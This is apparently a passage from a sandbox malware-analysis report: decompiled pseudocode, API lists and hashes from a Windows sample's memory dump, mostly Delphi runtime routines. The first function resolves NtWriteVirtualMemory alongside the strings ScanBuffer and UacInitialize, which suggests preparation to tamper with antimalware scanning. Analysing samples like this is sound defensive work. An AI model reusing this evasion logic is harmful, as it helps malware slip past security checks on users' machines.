                    				E032647B0( &_v208,  *0x329e544, 0x327c8b0);
                    				E03264698( &_v204, E03264964(_v208));
                    				_pop(_t414);
                    				E03277C04(_v204,  *0x329e544, _t414, _t446);
                    				_t276 =  *0x329e548; // 0x0
                    				_t279 =  *0x329a888; // 0x329e320
                    				 *( *_t279)(_t438, _t440, _v8, _t276 - _v12, _v16);
                    				_push(0x327c8b0);
                    				_push( *0x329e544);
                    				_push("OpenSession");
                    				E03264824();
                    				E03264698( &_v212, E03264964(_v216));
                    				_push(_v212);
                    				E032647B0( &_v224,  *0x329e544, 0x327c8b0);
                    				E03264698( &_v220, E03264964(_v224));
                    				_pop(_t419);
                    				E03277C04(_v220,  *0x329e544, _t419, _t446);
                    				_push(0x327c8b0);
                    				_push( *0x329e544);
                    				_push("ScanBuffer");
                    				E03264824();
                    				E03264698( &_v228, E03264964(_v232));
                    				_push(_v228);
                    				E032647B0( &_v240,  *0x329e544, 0x327c8b0);
                    				E03264698( &_v236, E03264964(_v240));
                    				_pop(_t424);
                    				E03277C04(_v236,  *0x329e544, _t424, _t446);
                    				_pop(_t425);
                    				 *[fs:eax] = _t425;
                    				_push(0x327c89c);
                    				return E032644C4( &_v240, 0x38);
                    			}

                    APIs
                    • GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtWriteVirtualMemory,ScanBuffer,0329E544,0327C8B0,UacInitialize,0329E544,0327C8B0,OpenSession,0329E544,0327C8B0,00000000,0327C895), ref: 0327C392
                    • GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 0327C398
                      • Part of subcall function 03277C04: LoadLibraryExA.KERNEL32(00000000,00000000,00000000,00000000,03277CA2), ref: 03277C3C
                      • Part of subcall function 03277C04: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,00000000,00000000,03277CA2), ref: 03277C4A
                      • Part of subcall function 03277C04: GetProcAddress.KERNEL32(73990000,00000000), ref: 03277C63
                      • Part of subcall function 03277C04: FreeLibrary.KERNEL32(73990000,73990000,00000000,00000000,00000000,00000000,00000000,00000000,03277CA2), ref: 03277C82
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.761893695.0000000003261000.00000020.00001000.00020000.00000000.sdmp, Offset: 03260000, based on PE: true
                    • Associated: 00000000.00000002.761886979.0000000003260000.00000002.00001000.00020000.00000000.sdmp
                    • Associated: 00000000.00000002.761941452.0000000003289000.00000004.00001000.00020000.00000000.sdmp
                    • Associated: 00000000.00000002.761941452.0000000003393000.00000004.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3260000_r096teIe1H.jbxd
                    Similarity
                    • API ID: AddressHandleLibraryModuleProc$FreeLoad
                    • String ID: C:\Windows\System32\ntdll.dll$NtWriteVirtualMemory$OpenSession$ScanBuffer$ScanString$UacInitialize
                    • API String ID: 232896157-171402031
                    • Opcode ID: b6b9bc87ad3051b35bfa775cf8b98586c06c473a486cf2b58be9a5de7243e537
                    • Instruction ID: 192c7638b4dc9ab14cf7dc66de54e8b1f6dc6cbc179443bccdce7d832f1c79b9
                    • Opcode Fuzzy Hash: b6b9bc87ad3051b35bfa775cf8b98586c06c473a486cf2b58be9a5de7243e537
                    • Instruction Fuzzy Hash: 30F10C39A202689FDB12FBA5DC90FDE73B5BF45600F1081A6A454BF214DAB0AEC5CF51
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 98%
                    			E0326252E(void* __eax) {
                    				void* _v8;
                    				char _v110600;
                    				char _v112644;
                    				char _v112645;
                    				signed int _v112652;
                    				char _v112653;
                    				char _v112654;
                    				char _v112660;
                    				intOrPtr _v112664;
                    				intOrPtr _v112668;
                    				intOrPtr _v112672;
                    				struct HWND__* _v112676;
                    				signed short* _v112680;
                    				intOrPtr* _v112684;
                    				char _v129068;
                    				char _v131117;
                    				char _v161836;
                    				void* _v162091;
                    				signed char _v162092;
                    				void* _t73;
                    				int _t79;
                    				signed int _t126;
                    				int _t131;
                    				intOrPtr _t132;
                    				char* _t134;
                    				char* _t135;
                    				char* _t136;
                    				char* _t137;
                    				char* _t138;
                    				char* _t139;
                    				char* _t141;
                    				char* _t142;
                    				char* _t147;
                    				char* _t148;
                    				intOrPtr _t180;
                    				void* _t182;
                    				void* _t184;
                    				void* _t185;
                    				intOrPtr* _t188;
                    				intOrPtr* _t189;
                    				signed int _t194;
                    				void* _t198;
                    				void* _t200;
                    				void* _t214;
                    
                    				_t198 = _t200;
                    				_push(__eax);
                    				_t73 = 0x27;
                    				goto L2;
                    				L13:
                    				while(_t180 != 0x329b708) {
                    					_t79 = E03262048(_t180);
                    					_t131 = _t79;
                    					__eflags = _t131;
                    					if(_t131 == 0) {
                    						L12:
                    						_t180 =  *((intOrPtr*)(_t180 + 4));
                    						continue;
                    					} else {
                    						goto L5;
                    					}
                    					do {
                    						L5:
                    						_t194 =  *(_t131 - 4);
                    						__eflags = _t194 & 0x00000001;
                    						if((_t194 & 0x00000001) == 0) {
                    							__eflags = _t194 & 0x00000004;
                    							if(__eflags == 0) {
                    								__eflags = _v112652 - 0x1000;
                    								if(_v112652 < 0x1000) {
                    									_v112664 = (_t194 & 0xfffffff0) - 4;
                    									_t126 = E0326238C(_t131);
                    									__eflags = _t126;
                    									if(_t126 == 0) {
                    										_v112645 = 0;
                    										 *((intOrPtr*)(_t198 + _v112652 * 4 - 0x1f828)) = _v112664;
                    										_t18 =  &_v112652;
                    										 *_t18 = _v112652 + 1;
                    										__eflags =  *_t18;
                    									}
                    								}
                    							} else {
                    								E032623E4(_t131, __eflags, _t198);
                    							}
                    						}
                    						_t79 = E03262024(_t131);
                    						_t131 = _t79;
                    						__eflags = _t131;
                    					} while (_t131 != 0);
                    					goto L12;
                    				}
                    				_t132 =  *0x329d7b0; // 0x7fde0000
                    				while(_t132 != 0x329d7ac && _v112652 < 0x1000) {
                    					_t79 = E0326238C(_t132 + 0x10);
                    					__eflags = _t79;
                    					if(_t79 == 0) {
                    						_v112645 = 0;
                    						_t22 = _t132 + 0xc; // 0xd0004
                    						_t79 = _v112652;
                    						 *((intOrPtr*)(_t198 + _t79 * 4 - 0x1f828)) = ( *_t22 & 0xfffffff0) - 0xfffffffffffffff4;
                    						_t27 =  &_v112652;
                    						 *_t27 = _v112652 + 1;
                    						__eflags =  *_t27;
                    					}
                    					_t29 = _t132 + 4; // 0x7f2d0000
                    					_t132 =  *_t29;
                    				}
                    				if(_v112645 != 0) {
                    					L49:
                    					return _t79;
                    				}
                    				_v112653 = 0;
                    				_v112668 = 0;
                    				_t134 = E032621E0(0x28,  &_v161836);
                    				_v112660 = 0x37;
                    				_v112680 = 0x3289042;
                    				_v112684 =  &_v110600;
                    				do {
                    					_v112672 = ( *_v112680 & 0x0000ffff) - 4;
                    					_v112654 = 0;
                    					_t182 = 0xff;
                    					_t188 = _v112684;
                    					while(_t134 <=  &_v131117) {
                    						if( *_t188 > 0) {
                    							if(_v112653 == 0) {
                    								_t134 = E032621E0(0x27, _t134);
                    								_v112653 = 1;
                    							}
                    							if(_v112654 != 0) {
                    								 *_t134 = 0x2c;
                    								_t139 = _t134 + 1;
                    								 *_t139 = 0x20;
                    								_t140 = _t139 + 1;
                    								__eflags = _t139 + 1;
                    							} else {
                    								 *_t134 = 0xd;
                    								 *((char*)(_t134 + 1)) = 0xa;
                    								_t147 = E032620C4(_v112668 + 1, _t134 + 2);
                    								 *_t147 = 0x20;
                    								_t148 = _t147 + 1;
                    								 *_t148 = 0x2d;
                    								 *((char*)(_t148 + 1)) = 0x20;
                    								_t140 = E032621E0(8, E032620C4(_v112672, _t148 + 2));
                    								_v112654 = 1;
                    							}
                    							_t214 = _t182 - 1;
                    							if(_t214 < 0) {
                    								_t141 = E032621E0(7, _t140);
                    							} else {
                    								if(_t214 == 0) {
                    									_t141 = E032621E0(6, _t140);
                    								} else {
                    									E0326363C( *((intOrPtr*)(_t188 - 4)),  &_v162092);
                    									_t141 = E032621E0(_v162092 & 0x000000ff, _t140);
                    								}
                    							}
                    							 *_t141 = 0x20;
                    							_t142 = _t141 + 1;
                    							 *_t142 = 0x78;
                    							 *((char*)(_t142 + 1)) = 0x20;
                    							_t134 = E032620C4( *_t188, _t142 + 2);
                    						}
                    						_t182 = _t182 - 1;
                    						_t188 = _t188 - 8;
                    						if(_t182 != 0xffffffff) {
                    							continue;
                    						} else {
                    							goto L38;
                    						}
                    					}
                    					L38:
                    					_v112668 = _v112672;
                    					_v112684 = _v112684 + 0x800;
                    					_v112680 =  &(_v112680[0x10]);
                    					_t60 =  &_v112660;
                    					 *_t60 = _v112660 - 1;
                    				} while ( *_t60 != 0);
                    				if(_v112652 <= 0) {
                    					L48:
                    					E032621E0(3, _t134);
                    					_t79 = MessageBoxA(0,  &_v161836, "Unexpected Memory Leak", 0x2010);
                    					goto L49;
                    				}
                    				if(_v112653 != 0) {
                    					 *_t134 = 0xd;
                    					_t136 = _t134 + 1;
                    					 *_t136 = 0xa;
                    					_t137 = _t136 + 1;
                    					 *_t137 = 0xd;
                    					_t138 = _t137 + 1;
                    					 *_t138 = 0xa;
                    					_t134 = _t138 + 1;
                    				}
                    				_t134 = E032621E0(0x3c, _t134);
                    				_t184 = _v112652 - 1;
                    				if(_t184 >= 0) {
                    					_t185 = _t184 + 1;
                    					_v112676 = 0;
                    					_t189 =  &_v129068;
                    					L44:
                    					if(_v112676 != 0) {
                    						 *_t134 = 0x2c;
                    						_t135 = _t134 + 1;
                    						 *_t135 = 0x20;
                    						_t134 = _t135 + 1;
                    					}
                    					_t134 = E032620C4( *_t189, _t134);
                    					if(_t134 >  &_v131117) {
                    						goto L48;
                    					}
                    					_v112676 =  &(_v112676->i);
                    					_t189 = _t189 + 4;
                    					_t185 = _t185 - 1;
                    					if(_t185 != 0) {
                    						goto L44;
                    					}
                    				}
                    				L2:
                    				_t200 = _t200 + 0xfffff004;
                    				_push(_t73);
                    				_t73 = _t73 - 1;
                    				if(_t73 != 0) {
                    					goto L2;
                    				} else {
                    					E03263098( &_v112644, 0x1b800);
                    					E03263098( &_v129068, 0x4000);
                    					_t79 = 0;
                    					_v112652 = 0;
                    					_v112645 = 1;
                    					_t180 =  *0x329b70c; // 0x91c0000
                    					goto L13;
                    				}
                    			}

                    Strings
                    • The sizes of unexpected leaked medium and large blocks are: , xrefs: 03262849
                    • The unexpected small block leaks are:, xrefs: 03262707
                    • bytes: , xrefs: 0326275D
                    • Unexpected Memory Leak, xrefs: 032628C0
                    • , xrefs: 03262814
                    • 7, xrefs: 032626A1
                    • An unexpected memory leak has occurred. , xrefs: 03262690
                    Memory Dump Source
                    • Source File: 00000000.00000002.761893695.0000000003261000.00000020.00001000.00020000.00000000.sdmp, Offset: 03260000, based on PE: true
                    • Associated: 00000000.00000002.761886979.0000000003260000.00000002.00001000.00020000.00000000.sdmp
                    • Associated: 00000000.00000002.761941452.0000000003289000.00000004.00001000.00020000.00000000.sdmp
                    • Associated: 00000000.00000002.761941452.0000000003393000.00000004.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3260000_r096teIe1H.jbxd
                    Similarity
                    • API ID:
                    • String ID: $ bytes: $7$An unexpected memory leak has occurred. $The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak
                    • API String ID: 0-2723507874
                    • Opcode ID: 779f13660341f44dc1d31402ba567402e67fcbedb2c88dbf375a7a6a80379cd2
                    • Instruction ID: 57874693f2b568bae20a0bb6ee9d6f49abb8bf3bb8e48238bead75ce6032ef31
                    • Opcode Fuzzy Hash: 779f13660341f44dc1d31402ba567402e67fcbedb2c88dbf375a7a6a80379cd2
                    • Instruction Fuzzy Hash: 6A71C534A24398CFDB21DA2CCC84BD8BAF9EF09700F1459E5D549DB282DBB58AC5CB51
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.761941452.0000000003289000.00000004.00001000.00020000.00000000.sdmp, Offset: 03260000, based on PE: true
                    • Associated: 00000000.00000002.761886979.0000000003260000.00000002.00001000.00020000.00000000.sdmp
                    • Associated: 00000000.00000002.761893695.0000000003261000.00000020.00001000.00020000.00000000.sdmp
                    • Associated: 00000000.00000002.761941452.0000000003393000.00000004.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3260000_r096teIe1H.jbxd
                    Similarity
                    • API ID:
                    • String ID: +$-$0$9$A$F$I$N$N$N
                    • API String ID: 0-1648577461
                    • Opcode ID: 2e8387257570eda45cc7b934ad265545eca86ec623c7b602e9144ae6f6a7cda6
                    • Instruction ID: 5ab91b341e6404df1f2e9b8a22b66250f9f2a12ad75c87571d04c49cb0c8a227
                    • Opcode Fuzzy Hash: 2e8387257570eda45cc7b934ad265545eca86ec623c7b602e9144ae6f6a7cda6
                    • Instruction Fuzzy Hash: C0E1A175E2424B9BFF10CFAAD5842EDFBB5BF08300F2481ABD815A7250D375AA90CB55
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.761941452.0000000003289000.00000004.00001000.00020000.00000000.sdmp, Offset: 03260000, based on PE: true
                    • Associated: 00000000.00000002.761886979.0000000003260000.00000002.00001000.00020000.00000000.sdmp
                    • Associated: 00000000.00000002.761893695.0000000003261000.00000020.00001000.00020000.00000000.sdmp
                    • Associated: 00000000.00000002.761941452.0000000003393000.00000004.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3260000_r096teIe1H.jbxd
                    Similarity
                    • API ID:
                    • String ID: +$-$0$9$A$F$I$N$N$N
                    • API String ID: 0-1648577461
                    • Opcode ID: f88074ef882d433715eecd647d47c0ec08558ead3a85b5924cd63f73f9c18cbf
                    • Instruction ID: 0d5fd2d881543e62f35df282a6a348f0f284aa4e84c4393e6c77f0e9b33da748
                    • Opcode Fuzzy Hash: f88074ef882d433715eecd647d47c0ec08558ead3a85b5924cd63f73f9c18cbf
                    • Instruction Fuzzy Hash: A3E1B174D2424BDFEF20CFA9C5846EDFBB1AF08300F24819BD855A7251D3716A91CBA5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 72%
                    			E0326BDA4(void* __ebx, void* __edx, void* __edi, void* __esi) {
                    				char _v8;
                    				char _v12;
                    				char _v16;
                    				char _v20;
                    				char _v24;
                    				char _v28;
                    				char _v32;
                    				char _v36;
                    				char _v40;
                    				char _v44;
                    				char _v48;
                    				char _v52;
                    				char _v56;
                    				char _v60;
                    				char _v64;
                    				char _v68;
                    				void* _t104;
                    				void* _t111;
                    				void* _t133;
                    				intOrPtr _t183;
                    				intOrPtr _t193;
                    				intOrPtr _t194;
                    
                    				_t191 = __esi;
                    				_t190 = __edi;
                    				_t193 = _t194;
                    				_t133 = 8;
                    				do {
                    					_push(0);
                    					_push(0);
                    					_t133 = _t133 - 1;
                    				} while (_t133 != 0);
                    				_push(__ebx);
                    				_push(_t193);
                    				_push(0x326c06f);
                    				_push( *[fs:eax]);
                    				 *[fs:eax] = _t194;
                    				E0326BCE0();
                    				E0326A85C(__ebx, __edi, __esi);
                    				_t196 =  *0x329d8d8;
                    				if( *0x329d8d8 != 0) {
                    					E0326AA34(__esi, _t196);
                    				}
                    				_t132 = GetThreadLocale();
                    				E0326A7A8(_t43, 0, 0x14,  &_v20);
                    				E032644F4(0x329d80c, _v20);
                    				E0326A7A8(_t43, 0x326c084, 0x1b,  &_v24);
                    				 *0x329d810 = E03267AEC(0x326c084, 0, _t196);
                    				E0326A7A8(_t132, 0x326c084, 0x1c,  &_v28);
                    				 *0x329d811 = E03267AEC(0x326c084, 0, _t196);
                    				 *0x329d812 = E0326A7F4(_t132, 0x2c, 0xf);
                    				 *0x329d813 = E0326A7F4(_t132, 0x2e, 0xe);
                    				E0326A7A8(_t132, 0x326c084, 0x19,  &_v32);
                    				 *0x329d814 = E03267AEC(0x326c084, 0, _t196);
                    				 *0x329d815 = E0326A7F4(_t132, 0x2f, 0x1d);
                    				E0326A7A8(_t132, "m/d/yy", 0x1f,  &_v40);
                    				E0326AAE4(_v40, _t132,  &_v36, _t190, _t191, _t196);
                    				E032644F4(0x329d818, _v36);
                    				E0326A7A8(_t132, "mmmm d, yyyy", 0x20,  &_v48);
                    				E0326AAE4(_v48, _t132,  &_v44, _t190, _t191, _t196);
                    				E032644F4(0x329d81c, _v44);
                    				 *0x329d820 = E0326A7F4(_t132, 0x3a, 0x1e);
                    				E0326A7A8(_t132, 0x326c0b8, 0x28,  &_v52);
                    				E032644F4(0x329d824, _v52);
                    				E0326A7A8(_t132, 0x326c0c4, 0x29,  &_v56);
                    				E032644F4(0x329d828, _v56);
                    				E032644A0( &_v12);
                    				E032644A0( &_v16);
                    				E0326A7A8(_t132, 0x326c084, 0x25,  &_v60);
                    				_t104 = E03267AEC(0x326c084, 0, _t196);
                    				_t197 = _t104;
                    				if(_t104 != 0) {
                    					E03264538( &_v8, 0x326c0dc);
                    				} else {
                    					E03264538( &_v8, 0x326c0d0);
                    				}
                    				E0326A7A8(_t132, 0x326c084, 0x23,  &_v64);
                    				_t111 = E03267AEC(0x326c084, 0, _t197);
                    				_t198 = _t111;
                    				if(_t111 == 0) {
                    					E0326A7A8(_t132, 0x326c084, 0x1005,  &_v68);
                    					if(E03267AEC(0x326c084, 0, _t198) != 0) {
                    						E03264538( &_v12, 0x326c0f8);
                    					} else {
                    						E03264538( &_v16, 0x326c0e8);
                    					}
                    				}
                    				_push(_v12);
                    				_push(_v8);
                    				_push(":mm");
                    				_push(_v16);
                    				E03264824();
                    				_push(_v12);
                    				_push(_v8);
                    				_push(":mm:ss");
                    				_push(_v16);
                    				E03264824();
                    				 *0x329d8da = E0326A7F4(_t132, 0x2c, 0xc);
                    				_pop(_t183);
                    				 *[fs:eax] = _t183;
                    				_push(E0326C076);
                    				return E032644C4( &_v68, 0x10);
                    			}

                    APIs
                    • GetThreadLocale.KERNEL32(00000000,0326C06F,?,?,00000000,00000000), ref: 0326BDDA
                      • Part of subcall function 0326A7A8: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0326A7C6
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.761893695.0000000003261000.00000020.00001000.00020000.00000000.sdmp, Offset: 03260000, based on PE: true
                    • Associated: 00000000.00000002.761886979.0000000003260000.00000002.00001000.00020000.00000000.sdmp
                    • Associated: 00000000.00000002.761941452.0000000003289000.00000004.00001000.00020000.00000000.sdmp
                    • Associated: 00000000.00000002.761941452.0000000003393000.00000004.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3260000_r096teIe1H.jbxd
                    Similarity
                    • API ID: Locale$InfoThread
                    • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                    • API String ID: 4232894706-2493093252
                    • Opcode ID: a8c1d8e8eccd8d158ebf2d900957ff9d167bccfd8815a121fa376409ad9bbf77
                    • Instruction ID: 229610e88246eddc39ae550f3d10c8d5213abc596d56a5b35f3616b168f57853
                    • Opcode Fuzzy Hash: a8c1d8e8eccd8d158ebf2d900957ff9d167bccfd8815a121fa376409ad9bbf77
                    • Instruction Fuzzy Hash: D7616378730388ABDB01FBA8EC5069E77B9AF88200F509475A141EF346CA79DDC69750
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 79%
                    			E03264320(void* __ecx) {
                    				long _v4;
                    				int _t3;
                    
                    				if( *0x329b04c == 0) {
                    					if( *0x3289030 == 0) {
                    						_t3 = MessageBoxA(0, "Runtime error     at 00000000", "Error", 0);
                    					}
                    					return _t3;
                    				} else {
                    					if( *0x329b220 == 0xd7b2 &&  *0x329b228 > 0) {
                    						 *0x329b238();
                    					}
                    					WriteFile(GetStdHandle(0xfffffff5), "Runtime error     at 00000000", 0x1e,  &_v4, 0);
                    					return WriteFile(GetStdHandle(0xfffffff5), E032643A8, 2,  &_v4, 0);
                    				}
                    			}

                    APIs
                    • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,032643E7,?,?,0329D7C8,?,?,032897A8,03266575,03288305), ref: 03264359
                    • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,032643E7,?,?,0329D7C8,?,?,032897A8,03266575,03288305), ref: 0326435F
                    • GetStdHandle.KERNEL32(000000F5,032643A8,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,032643E7,?,?,0329D7C8), ref: 03264374
                    • WriteFile.KERNEL32(00000000,000000F5,032643A8,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,032643E7,?,?), ref: 0326437A
                    • MessageBoxA.USER32 ref: 03264398
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.761893695.0000000003261000.00000020.00001000.00020000.00000000.sdmp, Offset: 03260000, based on PE: true
                    • Associated: 00000000.00000002.761886979.0000000003260000.00000002.00001000.00020000.00000000.sdmp
                    • Associated: 00000000.00000002.761941452.0000000003289000.00000004.00001000.00020000.00000000.sdmp
                    • Associated: 00000000.00000002.761941452.0000000003393000.00000004.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3260000_r096teIe1H.jbxd
                    Similarity
                    • API ID: FileHandleWrite$Message
                    • String ID: Error$Runtime error at 00000000
                    • API String ID: 1570097196-2970929446
                    • Opcode ID: 97fc03acaee9f1586b4c93cc61a0d4f8a5c361716bfcc2a4c0dbf716d6b97b9f
                    • Instruction ID: 3b67088cafa5dc8b5cec22a54a213b5caffd282e09b37627085d2dee1ac6d75d
                    • Opcode Fuzzy Hash: 97fc03acaee9f1586b4c93cc61a0d4f8a5c361716bfcc2a4c0dbf716d6b97b9f
                    • Instruction Fuzzy Hash: 75F090A4EB5344B8FA10F7A1BC4AF6D261C9F80F11FA88646B260DD0C597E060D09321
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E0326AEA8(void* __edx, void* __edi, void* __fp0) {
                    				void _v1024;
                    				char _v1088;
                    				long _v1092;
                    				void* _t12;
                    				char* _t14;
                    				intOrPtr _t16;
                    				intOrPtr _t18;
                    				intOrPtr _t24;
                    				long _t32;
                    
                    				E0326AD20(_t12,  &_v1024, __edx, __fp0, 0x400);
                    				_t14 =  *0x329a900; // 0x329b04c
                    				if( *_t14 == 0) {
                    					_t16 =  *0x329a7d4; // 0x326687c
                    					_t9 = _t16 + 4; // 0xffea
                    					_t18 =  *0x329d7f8; // 0x3260000
                    					LoadStringA(E03265874(_t18),  *_t9,  &_v1088, 0x40);
                    					return MessageBoxA(0,  &_v1024,  &_v1088, 0x2010);
                    				}
                    				_t24 =  *0x329a7fc; // 0x329b21c
                    				E03262D4C(E03262FC4(_t24));
                    				CharToOemA( &_v1024,  &_v1024);
                    				_t32 = E03268048( &_v1024, __edi);
                    				WriteFile(GetStdHandle(0xfffffff4),  &_v1024, _t32,  &_v1092, 0);
                    				return WriteFile(GetStdHandle(0xfffffff4), 0x326af6c, 2,  &_v1092, 0);
                    			}

                    APIs
                      • Part of subcall function 0326AD20: VirtualQuery.KERNEL32(?,?,0000001C), ref: 0326AD3D
                      • Part of subcall function 0326AD20: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0326AD61
                      • Part of subcall function 0326AD20: GetModuleFileNameA.KERNEL32(03260000,?,00000105), ref: 0326AD7C
                      • Part of subcall function 0326AD20: LoadStringA.USER32 ref: 0326AE12
                    • CharToOemA.USER32 ref: 0326AEDF
                    • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 0326AEFC
                    • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0326AF02
                    • GetStdHandle.KERNEL32(000000F4,0326AF6C,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0326AF17
                    • WriteFile.KERNEL32(00000000,000000F4,0326AF6C,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0326AF1D
                    • LoadStringA.USER32 ref: 0326AF3F
                    • MessageBoxA.USER32 ref: 0326AF55
                    Memory Dump Source
                    • Source File: 00000000.00000002.761893695.0000000003261000.00000020.00001000.00020000.00000000.sdmp, Offset: 03260000, based on PE: true
                    • Associated: 00000000.00000002.761886979.0000000003260000.00000002.00001000.00020000.00000000.sdmp
                    • Associated: 00000000.00000002.761941452.0000000003289000.00000004.00001000.00020000.00000000.sdmp
                    • Associated: 00000000.00000002.761941452.0000000003393000.00000004.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3260000_r096teIe1H.jbxd
                    Similarity
                    • API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
                    • String ID:
                    • API String ID: 185507032-0
                    • Opcode ID: 226a4653f65e92da9d295d4f29fdbd87fcdcb179e7480af3183a23fd902323fc
                    • Instruction ID: c604ff91590b887be7b4e239cfbb71df4096399dec3e29c4de078644c36d8646
                    • Opcode Fuzzy Hash: 226a4653f65e92da9d295d4f29fdbd87fcdcb179e7480af3183a23fd902323fc
                    • Instruction Fuzzy Hash: 1F112AFA164304BAD601FBA4DC85F9F77ECAF44700F404926B354EA0E1DAB5E9C487A2
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 77%
                    			E0326E570(short* __eax, intOrPtr __ecx, signed short* __edx) {
                    				char _v260;
                    				char _v768;
                    				char _v772;
                    				short* _v776;
                    				intOrPtr _v780;
                    				char _v784;
                    				signed int _v788;
                    				signed short* _v792;
                    				char _v796;
                    				char _v800;
                    				intOrPtr* _v804;
                    				void* __ebp;
                    				signed char _t47;
                    				signed int _t54;
                    				void* _t62;
                    				intOrPtr* _t73;
                    				signed short* _t91;
                    				void* _t93;
                    				void* _t95;
                    				void* _t98;
                    				void* _t99;
                    				intOrPtr* _t108;
                    				void* _t112;
                    				intOrPtr _t113;
                    				char* _t114;
                    				void* _t115;
                    
                    				_t100 = __ecx;
                    				_v780 = __ecx;
                    				_t91 = __edx;
                    				_v776 = __eax;
                    				if(( *(__edx + 1) & 0x00000020) == 0) {
                    					E0326E014(0x80070057);
                    				}
                    				_t47 =  *_t91 & 0x0000ffff;
                    				if((_t47 & 0x00000fff) != 0xc) {
                    					_push(_t91);
                    					_push(_v776);
                    					L0326CDD4();
                    					return E0326E014(_v776);
                    				} else {
                    					if((_t47 & 0x00000040) == 0) {
                    						_v792 = _t91[4];
                    					} else {
                    						_v792 =  *(_t91[4]);
                    					}
                    					_v788 =  *_v792 & 0x0000ffff;
                    					_t93 = _v788 - 1;
                    					if(_t93 < 0) {
                    						L9:
                    						_push( &_v772);
                    						_t54 = _v788;
                    						_push(_t54);
                    						_push(0xc);
                    						L0326D22C();
                    						_t113 = _t54;
                    						if(_t113 == 0) {
                    							E0326DD6C(_t100);
                    						}
                    						E0326E3C4(_v776);
                    						 *_v776 = 0x200c;
                    						 *((intOrPtr*)(_v776 + 8)) = _t113;
                    						_t95 = _v788 - 1;
                    						if(_t95 < 0) {
                    							L14:
                    							_t97 = _v788 - 1;
                    							if(E0326E4E4(_v788 - 1, _t115) != 0) {
                    								L0326D244();
                    								E0326E014(_v792);
                    								L0326D244();
                    								E0326E014( &_v260);
                    								_v780(_t113,  &_v260,  &_v800, _v792,  &_v260,  &_v796);
                    							}
                    							_t62 = E0326E514(_t97, _t115);
                    						} else {
                    							_t98 = _t95 + 1;
                    							_t73 =  &_v768;
                    							_t108 =  &_v260;
                    							do {
                    								 *_t108 =  *_t73;
                    								_t108 = _t108 + 4;
                    								_t73 = _t73 + 8;
                    								_t98 = _t98 - 1;
                    							} while (_t98 != 0);
                    							do {
                    								goto L14;
                    							} while (_t62 != 0);
                    							return _t62;
                    						}
                    					} else {
                    						_t99 = _t93 + 1;
                    						_t112 = 0;
                    						_t114 =  &_v772;
                    						do {
                    							_v804 = _t114;
                    							_push(_v804 + 4);
                    							_t18 = _t112 + 1; // 0x1
                    							_push(_v792);
                    							L0326D234();
                    							E0326E014(_v792);
                    							_push( &_v784);
                    							_t21 = _t112 + 1; // 0x1
                    							_push(_v792);
                    							L0326D23C();
                    							E0326E014(_v792);
                    							 *_v804 = _v784 -  *((intOrPtr*)(_v804 + 4)) + 1;
                    							_t112 = _t112 + 1;
                    							_t114 = _t114 + 8;
                    							_t99 = _t99 - 1;
                    						} while (_t99 != 0);
                    						goto L9;
                    					}
                    				}
                    			}

                    APIs
                    • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0326E609
                    • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0326E625
                    • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 0326E65E
                    • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0326E6DB
                    • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 0326E6F4
                    • VariantCopy.OLEAUT32(?,00000000), ref: 0326E729
                    Memory Dump Source
                    • Source File: 00000000.00000002.761893695.0000000003261000.00000020.00001000.00020000.00000000.sdmp, Offset: 03260000, based on PE: true
                    • Associated: 00000000.00000002.761886979.0000000003260000.00000002.00001000.00020000.00000000.sdmp
                    • Associated: 00000000.00000002.761941452.0000000003289000.00000004.00001000.00020000.00000000.sdmp
                    • Associated: 00000000.00000002.761941452.0000000003393000.00000004.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3260000_r096teIe1H.jbxd
                    Similarity
